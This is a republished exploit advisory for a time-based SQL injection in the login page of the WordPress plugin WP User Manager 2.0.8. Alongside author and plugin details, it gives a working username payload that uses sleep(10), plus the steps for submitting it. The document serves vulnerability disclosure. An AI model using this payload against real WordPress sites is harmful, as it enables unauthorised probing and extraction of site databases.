WordPress WP User Manager 2.0.8 SQL Injection

🗓️ 12 Nov 2018 00:00:00Reported by Socket_0x03Type

packetstorm🔗 packetstormsecurity.com👁 66 Views

WordPress WP User Manager 2.0.8 SQL Injection - Time-Based SQL Injection on login pag

`  
====================================================================  
WP User Manager v2.0.8 (WordPress Plugin) - Time-Based SQL Injection  
====================================================================  
  
____________________________________________________________________________________  
  
  
# Exploit Title: WP User Manager v2.0.8 (WordPress Plugin) - Time-Based SQL Injection  
  
# Date: [11-09-2018]  
  
# Category: Webapps  
  
____________________________________________________________________________________  
  
  
# Author: Socket_0x03 (Alvaro J. Gene)  
  
# Email: Socket_0x03 (at) teraexe (dot) com  
  
# Website: www.teraexe.com  
  
____________________________________________________________________________________  
  
  
# Software Link: https://wordpress.org/plugins/wp-user-manager  
  
# Plugin: WP User Manager  
  
# Version: v2.0.8 (last version)  
  
# File: login  
  
# Input: username  
  
# Language: This application is available in English language.  
  
# Plugin Description: A WordPress plugin to create user profiles with registration,  
login, password recovery, and other features.  
  
____________________________________________________________________________________  
  
  
# Time-Based SQL Injection:  
  
http://www.website.com/wordpress/index.php/login  
Username: iawcfqto'=sleep(10)='  
Password: password  
Click on Login  
  
`

12 Nov 2018 00:00Current

0.4Low risk

Vulners AI Score0.4